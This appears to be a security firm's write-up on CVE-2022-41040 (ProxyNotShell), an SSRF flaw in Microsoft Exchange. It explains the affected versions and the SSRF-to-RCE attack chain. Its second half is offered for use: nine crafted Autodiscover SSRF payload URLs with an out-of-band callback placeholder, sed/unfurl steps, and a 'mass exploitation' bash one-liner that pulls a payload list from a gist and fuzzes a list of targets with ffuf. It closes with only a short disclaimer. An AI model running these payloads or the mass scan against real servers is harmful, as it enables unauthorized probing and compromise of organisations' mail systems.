Server Side Request Forgery (SSRF) in Microsoft Exchange Server

CVE-2022-41040

CVE-2022-41040 (ProxyNotShell)

Details:

CVE-2022-41040 affects:

  • Microsoft Exchange Server 2013 version Cumulative Update 23
  • Microsoft Exchange Server 2016 Cumulative Update 22
  • Microsoft Exchange Server 2019 Cumulative Update 11
  • Microsoft Exchange Server 2019 Cumulative Update 12
  • Microsoft Exchange Server 2016 Cumulative Update 23

The initial vulnerability in the ProxyNotShell exploitation sequence is identified as CVE-2022-41040. It is a Server-Side Request Forgery (SSRF) vulnerability that exists in the Exchange Autodiscover frontend and does not require authentication. The vulnerability has been assigned a CVSS score of 8.8, which is considered to be High. Attackers take advantage of this vulnerability by sending a crafted request, including a controlled URI and data, to a backend service with LocalSystem privilege.

What is ProxyNotShell

ProxyNotShell is not just one problem, but a group of issues that can be used together to gain control of Microsoft Exchange email servers. There are two main vulnerabilities: one is called Server-Side Request Forgery (SSRF) and the other is called Remote Code Execution (RCE). The SSRF vulnerability allows an attacker who is already in the system to trigger the RCE vulnerability. The RCE vulnerability allows the attacker to execute commands on the system. The first vulnerability, SSRF, is CVE-2022-41040, and the second one, RCE, is CVE-2022-41082.

On November 8, 2022, Microsoft released updates to fix these vulnerabilities, and it is recommended that organizations update their Exchange Servers to the latest version to protect their systems.

Technical analysis

In the first phase of this attack, the attacker leverages the vulnerability CVE-2022-41040, which is an unauthenticated Server-Side Request Forgery vulnerability found in the Exchange Autodiscover frontend. By exploiting this vulnerability, the attacker can gain access to the privileged endpoint of the Exchange Server API (https://%exchange server domain%/powershell) by using a known login and password combination of a registered account.

Once the attacker has access to the PowerShell API endpoint, they can execute PowerShell commands in the Exchange environment on the server machine by passing them in the payload via the XML Simple Object Access Protocol (SOAP).

In the next phase, the attacker aims to gain access to Web-Based Enterprise Management (WBEM) through the WS-Management Protocol. To achieve this, the attacker initiates a shell on the vulnerable system for further PowerShell script execution via Windows Remote Management (PsRemoting). This allows the attacker to have remote access to the system to execute arbitrary commands and potentially compromise the targeted Exchange Server.

Exploitation (CVE-2022-41040)

Manual

Replace COLLABHERE with your OOB domain – sed 's/COLLABHERE/<oob-domain>/g

Add payloads next to URLs you want to test echo http://target.com|unfurl format %s://%d/<payload>

Payloads:

/autodiscover/autodiscover.json?@%d.v1.COLLABHERE/&Email=autodiscover/autodiscover.json%3f@%d.v1.COLLABHERE
/autodiscover/autodiscover.json/v1.0/aa@%d.v2.COLLABHERE?Protocol=Autodiscoverv1
/autodiscover/autodiscover.json/v1.0/aa..@%d.v3.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a..@%d.v3.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell
/autodiscover/autodiscover.json/v1.0/aa@%d.v4.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a@%d.v4.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell
/autodiscover/autodiscover.json?aa..%d.v5.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a..%d.v5.COLLABHERE&Protocol=Autodiscoverv1&%d.v5.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json?aa@%d.v6.COLLABHERE/owa/?&Email=autodiscover/autodiscover.json?a@%d.v6.COLLABHERE&Protocol=Autodiscoverv1&%d.v6.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json?aa..%d.v7.COLLABHERE/owa/?&Email=aa@autodiscover/autodiscover.json?a..%d.v7.COLLABHERE&Protocol=Autodiscoverv1&%d.v7.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json?aa@%d.v8.COLLABHERE/owa/?&Email=aa@autodiscover/autodiscover.json?a@%d.v8.COLLABHERE&Protocol=Autodiscoverv1&%d.v8.COLLABHEREProtocol=Powershell
/autodiscover/autodiscover.json/v1.0/aa@autodiscover/autodiscover.json?a..@%d.v9.COLLABHERE&Protocol=Autodiscoverv1&Protocol=Powershell

Visit crafted URLs and check collaborator.

Mass exploitation

Simple bash one-liner which uses unfurl and ffuf. 

for url in $(curl -s https://gist.githubusercontent.com/kljunowsky/a2e8392f63fb8d7c0443f2011bce59ec/raw/7b4cabaa0dab7113b1cab00e1a2cb0c4e3c6ed06/cve-2022-41040-unfurl-payloads.txt|sed 's/COLLABHERE/<OOB-PAYLOAD>/g'); do cat targets.txt |unfurl format $url >> fuzz-ready.txt;done & ffuf -w fuzz-ready.txt -u FUZZ

Please use it wisely. Scan targets you have permission to. Shift Security Consulting is not responsible for any damage.